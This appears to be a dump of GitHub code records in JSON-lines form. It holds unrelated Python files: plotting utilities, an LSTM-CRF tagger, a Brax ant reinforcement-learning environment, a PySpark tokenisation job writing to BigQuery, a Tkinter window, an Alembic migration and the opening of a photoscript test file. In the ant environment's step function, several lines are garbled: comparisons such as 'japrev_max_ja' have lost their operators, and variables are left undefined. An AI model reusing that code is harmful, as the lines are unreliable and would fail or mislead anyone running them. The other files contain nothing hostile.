**kwargs)\n\n return result\n\n\ndef plot_open(field, cache=None, **kwargs):\n\n if cache:\n return open(cached_plot(field, cache, **kwargs))\n\n fd, tmp = tempfile.mkstemp('.' + kwargs.get(\"format\", \"png\"))\n os.close(fd)\n\n print(tmp, field)\n plot_to_file(field, tmp, **kwargs)\n\n f = open(tmp, 'rb')\n\n os.unlink(tmp)\n\n return f\n\n\ndef plot(field, save=None, **kwargs):\n\n if save:\n plot_to_file(field, save, **kwargs)\n\n from IPython.display import Image\n\n fd, tmp = tempfile.mkstemp('.' + kwargs.get(\"format\", \"png\"))\n os.close(fd)\n\n plot_to_file(field, tmp, **kwargs)\n img = Image(tmp)\n\n os.unlink(tmp)\n\n return img\n\n\ndef plot_from_data(data, format='png'):\n\n class Plottable:\n\n def __init__(self, values, shape, metadata, **kwargs):\n self.array = np.reshape(np.array(values), tuple(shape))\n self.area = metadata.pop('area')\n self.grid = metadata.pop('grid')\n self.metadata = metadata\n\n field = Plottable(**data)\n contour = data.get(\"metadata\", {}).get(\"contour\")\n\n if 'field2' in data:\n data2 = data['field2']\n field = [field, Plottable(**data2)]\n contour = [contour, data2.get(\"metadata\", {}).get(\"contour\")]\n\n if data.get('zindex', 0) > data2.get('zindex', 0):\n field = [field[1], field[0]]\n contour = [contour[1], contour[0]]\n\n with closing(plot_open(field, contour=contour, format=format)) as f:\n return f.read()\n\n\nif __name__ == '__main__':\n from collections import namedtuple\n import resource\n size = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n print('size', size / 1024, 'mb')\n\n for n in range(0, 20):\n\n Field = namedtuple('Field', ['array',\n 'area',\n 'first_latitude',\n 'latitude_increment',\n 'first_longitude',\n 'longitude_increment',\n 'metadata'])\n field = Field(np.random.rand(32, 32) * 10.0 + 273.15,\n [60.0, -14.0, 44.5, 1.5],\n 60.0,\n 1.5,\n -14.0,\n 1.5,\n dict(level=2,\n marsClass='ei',\n marsStream='oper',\n marsType='an',\n paramId=167,\n typeOfLevel='surface',\n units='K'))\n\n plot_to_file(field, 'test.png')\n newsize = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n print('increment', (newsize - size) / 1024, 'mb')\n size = newsize\n print('size', size / 1024, 'mb')\n","repo_name":"b8raoult/analogues","sub_path":"lib/analogues/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":14701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41116563260","text":"#coding:utf-8\n\nimport sys\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom models.model import Model\nfrom modules.embedding.embedding import TokenEmbedding\nfrom modules.encoder.lstm_encoder import LstmEncoderLayer\nfrom modules.decoder.crf import CRF\n\nclass LstmCrfTagger(Model):\n def __init__(self, label_nums, vocab_size, input_dim,\n hidden_size, num_layers, use_crf=True,\n bidirection=True, batch_first=True, device=None,\n dropout=0.0, averge_batch_loss=True, **kwargs):\n \"\"\"\n ref: Neural Architectures for Named Entity Recognition\n 模型结构是word_embedding + bilstm + crf\n\n :params \n \"\"\"\n super(LstmCrfTagger, self).__init__(input_dim, vocab_size, **kwargs)\n\n self.encoder = LstmEncoderLayer(input_dim, hidden_size, num_layers, label_nums=label_nums+2,\n bidirectional=bidirection, batch_first=batch_first, dropout=dropout)\n\n self.averge_batch_loss = averge_batch_loss\n self.use_crf = use_crf\n if self.use_crf:\n self.decoder = CRF(label_nums, device)\n\n def forward(self, input, input_seq_length,\n mask=None, batch_label=None):\n\n embedding = self.embedding(input) #batch_size * seq_len * input_dim\n encoder_res = self.encoder(embedding, input_seq_length) #batch * seq_len * (hidden_dim*directions)\n batch_size = encoder_res.size(0)\n seq_len = encoder_res.size(1)\n\n if self.use_crf:\n _, tag_seq = self.decoder._viterbi_decode(encoder_res, mask)\n if batch_label is not None:\n total_loss = self.decoder.neg_log_likelihood_loss(encoder_res, mask, batch_label)\n \n else:\n outs = encoder_res.view(batch_size * seq_len, -1)\n _, tag_seq = torch.max(outs, 1)\n tag_seq = tag_seq.view(batch_size, seq_len)\n tag_seq = mask.long() * tag_seq\n if batch_label is not None:\n loss_function = nn.NLLLoss(ignore_index=0, size_average=False)#mask的token不对最后的loss产生影响, 固定mask的label id为0\n score = F.log_softmax(outs, 1)\n total_loss = loss_function(score, batch_label.view(batch_size * seq_len))\n\n if batch_label is not None:\n if self.averge_batch_loss:\n total_loss = total_loss / batch_size\n return {\"loss\":total_loss, \"logits\": tag_seq}\n else:\n return {\"logits\": tag_seq}\n\n def predict(self, input, input_seq_length, mask=None):\n input = input.unsqueeze(0)\n res = self.forward(input, input_seq_length, mask)\n return res[\"logits\"]\n\n\n \n\n\n\n\n\n\n","repo_name":"waterzxj/UNF","sub_path":"UNF/models/lstm_crf.py","file_name":"lstm_crf.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"76"} +{"seq_id":"9487707206","text":"## pylint:disable=g-multiple-import\n\"\"\"Creates an environment for the lowest level of a hierarchical framework\"\"\"\nimport sys\nimport inspect\nimport os\n\nfrom hct.envs.goal import Goal\nfrom hct.envs.tools import *\nfrom hct.training.configs import NetworkArchitecture, SMALL_TRANSFORMER_CONFIGS, DEFAULT_MLP_CONFIGS\nfrom hct.io import model, html\n\nfrom brax import base, generalized, math\nfrom brax.envs.base import Env, PipelineEnv, State\nfrom brax.io import mjcf\nfrom brax.kinematics import forward\n\nfrom etils import epath\n\nimport jax\nfrom jax import numpy as jp\n\nfrom typing import Optional, Literal, Tuple\n\nfrom absl import logging\n\n\nclass AntTest(PipelineEnv):\n\n\n def __init__(\n self,\n ctrl_cost_weight=0.5,\n use_contact_forces=False,\n contact_cost_weight=5e-4,\n healthy_reward=1.0,\n terminate_when_unhealthy=True,\n healthy_z_range=(0.2, 1.0),\n contact_force_range=(-1.0, 1.0),\n reset_noise_scale=0.1,\n exclude_current_positions_from_observation=True,\n backend='positional',\n architecture_configs=None,\n **kwargs,\n ):\n frame = inspect.currentframe()\n args, _, _, values = inspect.getargvalues(frame)\n self.parameters = {arg: values[arg] for arg in args}\n self.parameters.pop('self')\n \n path = epath.resource_path('hct') / f'envs/assets/ant.xml'\n sys = mjcf.load(path)\n\n n_frames = 5\n\n if backend in ['spring', 'positional']:\n sys = sys.replace(dt=0.005)\n n_frames = 10\n\n if backend == 'positional':\n sys = sys.replace(\n actuator=sys.actuator.replace(\n gear=200 * jp.ones_like(sys.actuator.gear)\n )\n )\n\n kwargs['n_frames'] = kwargs.get('n_frames', n_frames)\n\n super().__init__(sys=sys, backend=backend, **kwargs)\n\n self._ctrl_cost_weight = ctrl_cost_weight\n self._use_contact_forces = use_contact_forces\n self._contact_cost_weight = contact_cost_weight\n self._healthy_reward = healthy_reward\n self._terminate_when_unhealthy = terminate_when_unhealthy\n self._healthy_z_range = healthy_z_range\n self._contact_force_range = contact_force_range\n self._reset_noise_scale = reset_noise_scale\n self._exclude_current_positions_from_observation = (\n exclude_current_positions_from_observation\n )\n\n # Training attributes\n self.obs_mask = None\n self.non_actuator_nodes = None\n self.action_mask = None\n self.num_nodes = 9\n\n # Network architecture\n self.network_architecture = NetworkArchitecture.create(name='MLP', **DEFAULT_MLP_CONFIGS)\n self.max_actions_per_node = 1 if self.network_architecture.name=='Transformer' else 8\n\n self.action_repeat = 1\n self.horizon = 72\n self.episode_length = 1000\n self.action_shape = (8, 1)\n\n\n self.episode_length = 1000\n if self._use_contact_forces:\n raise NotImplementedError('use_contact_forces not implemented.')\n\n def reset(self, rng) -> State:\n \"\"\"Resets the environment to an initial state.\"\"\"\n\n\n pipeline_state = self._sample_state(rng)\n obs = self._get_obs(pipeline_state)\n\n reward, done, zero = jp.zeros(3)\n\n zeros = jp.zeros((self.action_size,))\n metrics = {\n 'reward': zero\n }\n\n info = {\n 'rng': jax.random.split(rng)[0],\n 'min_ja': zeros,\n 'max_ja': zeros,\n 'min_jv': zeros,\n 'max_jv': zeros\n }\n\n return State(pipeline_state, obs, reward, done, metrics, info)\n\n def step(self, state: State, action: jp.ndarray) -> State:\n \"\"\"Run one timestep of the environment's dynamics.\"\"\"\n pipeline_state0 = state.pipeline_state\n pipeline_state = self.pipeline_step(pipeline_state0, action)\n\n rng, rng1 = jax.random.split(state.info['rng'])\n prev_min_ja, prev_max_ja = state.info['min_ja'], state.info['max_ja']\n prev_min_jv, prev_max_jv = state.info['min_jv'], state.info['max_jv']\n\n is_healthy = jp.where(rotate(jp.array([0, 0, 1]), pipeline_state.x.rot[0])[-1] > 0, x=1.0, y=0.0)\n\n if self._terminate_when_unhealthy:\n healthy_reward = self._healthy_reward\n else:\n healthy_reward = self._healthy_reward * is_healthy\n\n ja = state.pipeline_state.q[7:]\n jv = state.pipeline_state.qd[6:]\n\n min_ja = jp.where(japrev_max_ja, x=ja, y=prev_max_ja)\n min_jv = jp.where(jvprev_max_jv, x=jv, y=prev_max_jv)\n\n abs_cur = jp.abs(min_ja) + jp.abs(max_ja) + jp.abs(min_jv) + jp.abs(max_jv)\n abs_prev = jp.abs(prev_min_ja) + jp.abs(prev_max_ja) + jp.abs(prev_min_jv) + jp.abs(prev_max_jv)\n\n diff = abs_cur - abs_prev\n reward = jp.sum(jp.square(jp.where(diff > 0, abs_cur, 0)))\n\n done = 1.0 - is_healthy if self._terminate_when_unhealthy else 0.0\n\n pipeline_state = jax.lax.cond(done, self._sample_state, lambda x: pipeline_state, rng1)\n obs = self._get_obs(pipeline_state)\n\n state.metrics.update(\n reward=reward\n )\n state.info.update(\n rng=rng,\n min_ja=min_ja,\n max_ja=max_ja,\n min_jv=min_jv,\n max_jv=max_jv)\n \n return state.replace(\n pipeline_state=pipeline_state, obs=obs, reward=reward, done=done\n )\n\n def _get_obs(self, pipeline_state: base.State) -> jp.ndarray:\n \"\"\"Observe ant body position and velocities.\"\"\"\n qpos = pipeline_state.q\n qvel = pipeline_state.qd\n\n if self._exclude_current_positions_from_observation:\n qpos = pipeline_state.q[2:]\n\n return jp.concatenate([qpos] + [qvel])\n \n def _sample_state(self, rng: jp.ndarray):\n \"\"\"\n Samples normalised goal and outputs a goal state \n \n Goal is restricted to ensure a valid state, and acheive a range of positions\n that are expected to be achieved by the optimal policy. Restictions on\n Z position of all links\n Root rotation\n Number of feet in contact with ground:\n Randomly sample an ordered subset of end effector IDs\n Ensure that these end effectors are in contact with ground\n\n Args:\n rng: jp.ndarray\n\n Returns:\n goal: Goal\n \"\"\"\n\n rng, rng1, rng2, rng3, rng4 = jax.random.split(rng, 5)\n\n low, hi = -self._reset_noise_scale, self._reset_noise_scale\n\n q = self.sys.init_q + jax.random.uniform(\n rng3, (self.sys.q_size(),), minval=low, maxval=hi\n )\n\n qd = hi * jax.random.normal(rng4, (self.sys.qd_size(),))\n\n return self.pipeline_init(q, qd)\n\n def move_limbs(self, limb_ids, actuator_force):\n return jp.zeros((self.action_size,)).at[jp.array(limb_ids)].set(actuator_force)\n \n \n def test_rollout(self):\n \n path = epath.resource_path('hct') / f'envs/assets/ant_test.xml'\n self.sys = mjcf.load(path)\n\n def reset(limit_id: int) -> State:\n \"\"\"Resets the environment to an initial state.\"\"\"\n\n joint_angles = jax.lax.select(limit_id==0, jp.array(self.sys.dof.limit[0]), jp.array(self.sys.dof.limit[1]))\n q = jp.concatenate([jp.array([0,0,0,1,0,0,0]), joint_angles[6:]])\n qd = jp.zeros((self.sys.qd_size(),))\n \n if limit_id is None:\n q = self.sys.init_q\n\n pipeline_state = self.pipeline_init(q, qd)\n obs = self._get_obs(pipeline_state)\n\n reward, done, zero = jp.zeros(3)\n metrics = {\n 'reward_forward': zero,\n 'reward_survive': zero,\n 'reward_ctrl': zero,\n 'reward_contact': zero,\n 'x_position': zero,\n 'y_position': zero,\n 'distance_from_origin': zero,\n 'x_velocity': zero,\n 'y_velocity': zero,\n 'forward_reward': zero,\n }\n return State(pipeline_state, obs, reward, done, metrics)\n\n def step(state: State, action: jp.ndarray) -> State:\n \"\"\"Run one timestep of the environment's dynamics.\"\"\"\n pipeline_state0 = state.pipeline_state\n pipeline_state = self.pipeline_step(pipeline_state0, action)\n\n velocity = (pipeline_state.x.pos[0] - pipeline_state0.x.pos[0]) / self.dt\n forward_reward = velocity[0]\n\n min_z, max_z = self._healthy_z_range\n is_healthy = jp.where(pipeline_state.x.pos[0, 2] < min_z, x=0.0, y=1.0)\n is_healthy = jp.where(\n pipeline_state.x.pos[0, 2] > max_z, x=0.0, y=is_healthy\n )\n if self._terminate_when_unhealthy:\n healthy_reward = self._healthy_reward\n else:\n healthy_reward = self._healthy_reward * is_healthy\n ctrl_cost = self._ctrl_cost_weight * jp.sum(jp.square(action))\n contact_cost = 0.0\n\n obs = self._get_obs(pipeline_state)\n reward = forward_reward + healthy_reward - ctrl_cost - contact_cost\n done = 1.0 - is_healthy if self._terminate_when_unhealthy else 0.0\n state.metrics.update(\n reward_forward=forward_reward,\n reward_survive=healthy_reward,\n reward_ctrl=-ctrl_cost,\n reward_contact=-contact_cost,\n x_position=pipeline_state.x.pos[0, 0],\n y_position=pipeline_state.x.pos[0, 1],\n distance_from_origin=math.safe_norm(pipeline_state.x.pos[0]),\n x_velocity=velocity[0],\n y_velocity=velocity[1],\n forward_reward=forward_reward,\n )\n return state.replace(\n pipeline_state=pipeline_state, obs=obs, reward=reward, done=done\n )\n\n\n filename = '/nfs/nhome/live/aoomerjee/MSc-Thesis/hct/envs/ranges/test_rollout'\n\n if os.path.isfile(filename):\n return model.load(filename)\n\n jit_env_reset = jax.jit(reset)\n jit_env_step = jax.jit(step)\n jit_move_limbs = jax.jit(self.move_limbs)\n\n state = jit_env_reset(limit_id=None)\n rollout = [state.pipeline_state]\n\n limb_movements = (\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(0,8,2)), -1),\n (list(range(0,8,2)), 1),\n (list(range(0,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(0,8,2)), 1),\n (list(range(0,8,2)), -1),\n (list(range(0,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n )\n\n for args in limb_movements:\n for _ in range(30):\n act = jit_move_limbs(*args)\n state = jit_env_step(state, act)\n rollout.append(state.pipeline_state)\n\n output = (rollout, html.render(self.sys.replace(dt=self.dt), rollout))\n\n model.save(filename, output)\n path = epath.resource_path('hct') / f'envs/assets/ant.xml'\n self.sys = mjcf.load(path)\n\n return output\n\n\n\n\n\n''' \n def _limb_dist(\n self, \n state1: base.State, \n state2: base.State, \n limb_id: int, \n frame: Literal['world', 'relative']):\n \"\"\"\n Computes distance d(s,g) between state and goal in world frame, \n accounting for quaternion double cover.\n\n dist(s,g) = ||s-g||\n \"\"\"\n if frame == 'world':\n state1_x = state1.x.take(limb_id)\n state1_xd = state1.xd.take(limb_id) \n state2_x = state2.x.take(limb_id)\n state2_xd = state2.xd.take(limb_id)\n else:\n state1_x = world_to_relative(state1.x.take(limb_id), self.sys)\n state1_xd = world_to_relative(state1.xd.take(limb_id), self.sys)\n state2_x = world_to_relative(state2.x.take(limb_id), self.sys)\n state2_xd = world_to_relative(state2.xd.take(limb_id), self.sys)\n\n rpos = state1_x.pos - state2_x.pos\n rrot = dist_quat(state1_x.rot, state2_x.rot)\n rx = concatenate_attrs(base.Transform(rpos, rrot))\n rxd = concatenate_attrs(state1_xd.__sub__(state2_xd))\n x_dist = safe_norm(rx) \n xd_dist = safe_norm(rxd)\n return x_dist, xd_dist\n'''\n\n\n'''\n def get_limb_x_dist(self, x0: base.Transform, x1: base.Transform, limb_id):\n x0 = x0.take(limb_id)\n x1 = x1.take(limb_id)\n rpos = x0.pos - x1.pos\n rrot = dist_quat(x0.rot, x1.rot)\n rx = concatenate_attrs(base.Transform(rpos, rrot))\n x_dist = safe_norm(rx) \n return x_dist\n\n def get_limb_xd_dist(self, xd0: base.Transform, xd1: base.Transform, limb_id):\n xd0 = xd0.take(limb_id)\n xd1 = xd1.take(limb_id)\n rxd = concatenate_attrs(xd0.__sub__(xd1)) \n return safe_norm(rxd)\n \n\n def get_limb_ranges(self):\n\n test_rollout, html = self.test_rollout()\n \n quaternion_to_spherical_vmap = jax.vmap(quaternion_to_spherical, in_axes=0)\n jit_env_reset = jax.jit(self.reset)\n jit_env_step = jax.jit(self.step)\n jit_move_limbs = jax.jit(self.move_limbs)\n\n q0 = jp.concatenate([jp.array([0,0,0,1,0,0,0]), jp.array(self.sys.dof.limit[0])[6:]])\n q1 = jp.concatenate([jp.array([0,0,0,1,0,0,0]), jp.array(self.sys.dof.limit[1])[6:]])\n\n qd0 = jp.zeros((self.sys.qd_size(),)) \n\n x0 = world_to_relative(forward(self.sys, q0, qd0)[0], self.sys)\n x1= world_to_relative(forward(self.sys, q1, qd0)[0], self.sys)\n\n xd0 = base.Motion.zero(shape = (self.sys.num_links(),))\n xd0 = world_to_relative(xd0, self.sys)\n\n upper_leg_dists = {}\n lower_leg_dists = {}\n\n upper_leg_dists['max_x_dist'] = self.get_limb_x_dist(x0, x1, 1)\n lower_leg_dists['max_x_dist'] = self.get_limb_x_dist(x0, x1, 2)\n\n rollout = []\n rollout_rel_x = []\n rollout_rel_xd = []\n\n ''' \n'''\nfor ranges in (upper_leg_dists, lower_leg_dists):\n\n if ranges == upper_leg_dists:\n limb_id = 3\n else:\n limb_id = 4\n\n ranges['max_xd_dist'] = 0'''\n'''\n for limit_id in (0,1):\n\n for actuator_force in (-1,1,-1,1):\n\n state = jit_env_reset(limit_id=limit_id)\n\n for _ in range(30):\n\n rollout.append(state.pipeline_state)\n\n pipeline_state_rel_x = world_to_relative(state.pipeline_state.x, self.sys)\n pipeline_state_rel_xd = world_to_relative(state.pipeline_state.xd, self.sys)\n rollout_rel_x.append(pipeline_state_rel_x)\n rollout_rel_xd.append(pipeline_state_rel_xd)\n\n xd_dist = self.get_limb_xd_dist(xd0, pipeline_state_rel_xd , limb_id)\n if xd_dist > ranges['max_xd_dist']:\n ranges['max_xd_dist'] = xd_dist\n\n act = jit_move_limbs(limb_id=limb_id, actuator_force=actuator_force)\n state = jit_env_step(state, act)\n\n rollout_rel_pos = jp.stack([x.pos for x in rollout_rel_x])\n rollout_rel_rot = jp.stack([quaternion_to_spherical_vmap(x.rot) for x in rollout_rel_x])\n rollout_rel_vel = jp.stack([xd.vel for xd in rollout_rel_xd])\n rollout_rel_ang = jp.stack([xd.ang for xd in rollout_rel_xd])\n\n pos_ranges = jp.min(rollout_rel_pos, axis=0), jp.max(rollout_rel_pos, axis=0)\n rot_ranges = jp.min(rollout_rel_rot, axis=0), jp.max(rollout_rel_rot, axis=0)\n vel_ranges = jp.min(rollout_rel_vel, axis=0), jp.max(rollout_rel_vel, axis=0)\n ang_ranges = jp.min(rollout_rel_ang, axis=0), jp.max(rollout_rel_ang, axis=0)\n\n return_dict = {\n 'upper_leg_dists': upper_leg_dists, \n 'lower_leg_dists': lower_leg_dists,\n 'pos_ranges': pos_ranges, \n 'rot_ranges': rot_ranges, \n 'vel_ranges': vel_ranges, \n 'ang_ranges': ang_ranges, \n 'rollout': rollout,\n 'rollout_rel_x': rollout_rel_x,\n 'rollout_rel_xd': rollout_rel_xd,\n 'html': html.render(self.sys.replace(dt=self.dt), rollout)\n }\n return return_dict'''\n\n\n\n\n","repo_name":"adnanoomerjee/MSc-Thesis","sub_path":"hct/envs/ant_test.py","file_name":"ant_test.py","file_ext":"py","file_size_in_byte":15057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44732259446","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import types as T, functions as F\nfrom google.cloud import storage\nfrom datetime import datetime as dt\nimport MeCab\nimport copy\nimport jaconv\nimport pandas as pd\n\n\n\"\"\"\n=====================\nUDF and utilities\n=====================\n\"\"\"\n\n\"\"\"\nTokenizer UDF\n\"\"\"\nclass JapaneseTokenizer(object):\n def __init__(self):\n self.mecab = MeCab.Tagger(\n '-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd -u \"/usr/lib/x86_64-linux-gnu/mecab/dic/user/neologd_60_noskip.dic\"'\n )\n self.mecab.parseToNode('')\n \n def split(self, text):\n node = self.mecab.parseToNode(text)\n words = []\n while node:\n if node.surface:\n words.append(node.surface.decode(\"UTF-8\"))\n node = node.next\n return words\n\ndef tokenize(text):\n tokenizer = JapaneseTokenizer()\n return tokenizer.split(text)\n\ndef tokenize_and_create_rdd(text):\n return ','.join(tokenize(text.encode(\"UTF-8\")))\n\ntokenize_udf = F.udf(tokenize_and_create_rdd, T.StringType())\n\n\"\"\"\nstr_yyyymmdd_to_date UDF\n\"\"\"\ndef str_yyyymmdd_to_date(tdate):\n return '{0}-{1}-{2}'.format(tdate[0:4], tdate[4:6], tdate[6:8])\n\nstr_yyyymmdd_to_date_udf = F.udf(str_yyyymmdd_to_date, T.StringType())\n\n\"\"\"\nget_pre_id_and_post_id UDF\n\"\"\"\ndef get_pre_id_and_post_id(idx_id):\n return idx_id.split(\"_\")\n\nget_pre_id_and_post_id_udf = F.udf(get_pre_id_and_post_id, T.ArrayType(T.StringType()))\n\n\n\"\"\"\nget_latest_daily_file_name\n\"\"\"\ndef get_latest_daily_file_name(bucket_name, file_type, tdate, delimiter=None):\n storage_client = storage.Client()\n\n prefixCondition = file_type + \"/\" + file_type + \"_\" + tdate + \"_\"\n blobs = storage_client.list_blobs(\n bucket_name, prefix=prefixCondition, delimiter=delimiter\n )\n\n filename_list = {}\n for blob in blobs:\n file_date_str = blob.name.split('/')[-1].split('_')[-1].split('.')[0]\n tdatetime = dt.strptime(file_date_str, '%Y%m%d%H%M%S')\n filename_list[blob.name] = tdatetime\n \n if any(filename_list):\n latest_file_name = max(filename_list, key=filename_list.get)\n print(latest_file_name)\n return latest_file_name\n else:\n raise Exception(\"target file '{}' on '{}' is not exist ...\".format(file_type, tdate))\n\n\n\"\"\"\n=====================\nvars\n=====================\n\"\"\"\ntarget_date = \"20200929\"\ntarget_file_gcs_name = \"{target_file_gcs_name}\"\ntarget_file_type = \"{target_file_type}\"\n\nbigquery_dataset = \"{bigquery_dataset}\"\nbigquery_save_table = \"{bigquery_save_table}\"\n\ntry:\n login = pd.read_csv(r'login.txt', header=None)\n user = login[0][0]\n password = login[0][1]\n print('User information is ready!')\nexcept:\n print('Login information is not available!!')\n\nhost = '##.##.##.##'\ndb_name = 'db_name'\n\ncloud_sql_options_base = {\n \"url\": \"jdbc:mysql://{}:5432/{}\".format(host, db_name),\n \"driver\":\"com.mysql.jdbc.Driver\",\n \"user\":user,\n \"password\":password\n}\n\n\n\"\"\"\n=====================\nmain\n=====================\n\"\"\"\n\n\"\"\"\n初期化\n\"\"\"\nspark = SparkSession\\\n .builder\\\n .master('yarn')\\\n .appName('morph-prototype')\\\n .getOrCreate()\n\ntemp_bucket = \"hopstar-dev-dataproc\"\nspark.conf.set('temporaryGcsBucket', temp_bucket)\n\n\n\"\"\"\nCreate dataframe from tsv\n\"\"\"\ntarget_file_name = get_latest_daily_file_name(target_file_gcs_name, target_file_type, target_date)\n\ntsv_gcs_path='gs://{0}/{1}'.format(target_file_gcs_name, target_file_name)\ndf_tsv = spark.read.csv(tsv_gcs_path, sep=r'\\t', header=True)\n\n\n\"\"\"\nCreate dictionary dataframe from CloudSQL\n\"\"\"\ncloud_sql_options = copy.copy(cloud_sql_options_base)\n\n\ncloud_sql_options[\"dbtable\"] = \"post_keywords\"\ndf_post_keywords_base = spark.read.format(\"jdbc\").options(**cloud_sql_options).load()\n\n\"\"\"\nCreate Keyword\n\"\"\"\n\ndf_post_keywords = df_post_keywords_base.filter(df_post_keywords_base.status == 1).select(\"post_id\", \"keyword\")\n\npost_dics_dics = {}\n\npost_rows = df_post_keywords.collect()\npost_ids = [str(row[0]) for row in post_rows ]\npost_ids = list(set(post_ids))\n\nfor post_id in post_ids:\n post_dics_dics[post_id] = []\n \nfor row in post_rows:\n id = str(row[0])\n keyword = str(jaconv.h2z(row[1]).encode(\"UTF-8\").lower())\n post_dics_dics[id].append(keyword)\n\n\n\"\"\"\ncheck_having_the_post_dics_keyword\n\"\"\"\ndef check_having_the_post_dics_keyword(post_id, wakati):\n if post_id in post_dics_dics:\n wakati_array = wakati.split(\",\")\n hit_words = [hit_word for hit_word in wakati_array if jaconv.h2z(hit_word).encode(\"UTF-8\").lower() in post_dics_dics[post_id]]\n if any(hit_words):\n return \",\".join(list(set(hit_words)))\n else:\n return None\n else:\n return None\n\ncheck_having_the_post_dics_keyword_udf = F.udf(check_having_the_post_dics_keyword, T.StringType())\n\n\n\n\n\"\"\"\nCheck\n\"\"\"\ndf_check_base = df_tsv.withColumn(\"wakati\", tokenize_udf(F.col(\"text\")))\n\n# df_check_base = df_tsv\\\n# .limit(500)\\\n# .withColumn(\"wakati\", tokenize_udf(F.col(\"text\")))\n\ndf_check = df_check_base\\\n .withColumn(\"ids_array\", get_pre_id_and_post_id_udf(F.col(\"idx_id\")))\\\n .withColumn(\"pre_id\", F.col(\"ids_array\")[0])\\\n .withColumn(\"post_id\", F.col(\"ids_array\")[1])\\\n .withColumn(\"match_post_dics_keywords\", check_having_the_post_dics_keyword_udf(F.col(\"post_id\"), F.col(\"wakati\")))\\\n .drop(\"ids_array\")\\\n .drop(\"pre_id\")\\\n .drop(\"post_id\")\n\n\n\"\"\"\nSave to BigQuery\n\"\"\"\ndf_check_converted = df_check\\\n .withColumn(\"created_at\", df_check.created_at.cast(T.TimestampType()))\\\n .withColumn(\"tdate\", F.lit(str_yyyymmdd_to_date(target_date)))\\\n .withColumn(\"tdate\", F.lit(F.col(\"tdate\").cast(\"date\")))\n\ndf_check_converted\\\n .write\\\n .format('bigquery')\\\n .mode('append')\\\n .option('table', '{0}.{1}'.format(bigquery_dataset, bigquery_save_table))\\\n .option('partitionType', 'DAY')\\\n .option('partitionField', 'tdate')\\\n .save()\n","repo_name":"yukia3e/dataproc-morph-bigquery","sub_path":"DataprocMorphBigquery.py","file_name":"DataprocMorphBigquery.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71244980087","text":"import sqlite3\r\nfrom Tkinter import *\r\nimport os\r\n\r\n\r\ncreds = 'tempadmin.temp'\r\n\r\n\r\ndef getAdminUsername():\r\n print(\"getAdminUsername CALLED\")\r\n with open(creds) as f:\r\n data = f.readlines() \r\n u = data[1].rstrip()\r\n return u\r\n\r\n\r\n#main window\r\nroot=Tk()\r\nroot.title(\"GODSEYE\\\\\"+getAdminUsername())\r\n#root.overrideredirect(True)\r\nroot.geometry(\"{0}x{1}+0+0\".format(root.winfo_screenwidth(), root.winfo_screenheight()))\r\nroot.iconbitmap(r'C:\\Users\\parek\\Desktop\\GODSEYE\\GODSEYE openCV\\GUI\\icon1.ico')\r\nroot.configure(background=\"#033798\")\r\n\r\n#title\r\ntitle=Label(root,text=\"GODSEYE\",bg=\"#033798\",fg=\"#FFFFFF\")\r\ntitle.config(font=(\"Helvetica 50 bold\"))\r\ntitle.place(x=50, y=40)\r\n\r\n#secondary title\r\npageName=Label(root,text=\"Manage User Database\",bg=\"#033798\",fg=\"#A3B4D7\")\r\npageName.config(font=(\"Helvetica 25 bold\"))\r\npageName.place(x=900, y=70)\r\n\r\nroot.mainloop()\r\n","repo_name":"jayparekhjp/openCV-Facial-Recognition","sub_path":"Face Recognition SQLite - GPU/GUImanageUserDatabase.py","file_name":"GUImanageUserDatabase.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72839190326","text":"\"\"\"Add record unique constraint\n\nRevision ID: fc7aef9b17f8\nRevises: 4effed76d1e2\nCreate Date: 2021-02-24 17:05:51.046173\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"fc7aef9b17f8\"\ndown_revision = \"4effed76d1e2\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(\n None, \"record\", [\"ensemble_id\", \"realization_index\", \"name\"]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"record\", type_=\"unique\")\n # ### end Alembic commands ###\n","repo_name":"equinor/ert-storage","sub_path":"src/ert_storage/_alembic/alembic/versions/fc7aef9b17f8_add_record_unique_constraint.py","file_name":"fc7aef9b17f8_add_record_unique_constraint.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"26307599400","text":"\"\"\" Tests which require user interaction to run \"\"\"\n\nimport os\nimport pathlib\nimport tempfile\n\nimport pytest\nfrom applescript import AppleScript\n\nimport photoscript\nfrom tests.conftest import copy_photos_library, photoslib, suspend_capture\nfrom tests.photoscript_config_data import (\n ALBUM_1_NAME,\n ALBUM_1_PHOTO_EXPORT_FILENAMES,\n ALBUM_1_UUID,\n ALBUM_NAMES_ALL,\n ALBUM_NAMES_TOP,\n FOLDER_NAME,\n FOLDER_NAMES_ALL,\n FOLDER_NAMES_TOP,\n FOLDER_UUID,\n IMPORT_PATHS,\n IMPORT_PHOTOS,\n NUM_PHOTOS,\n PHOTO_EXPORT_2_FILENAMES,\n PHOTO_EXPORT_2_FILENAMES_ORIGINAL,\n PHOTO_EXPORT_FILENAME,\n PHOTO_EXPORT_UUID,\n 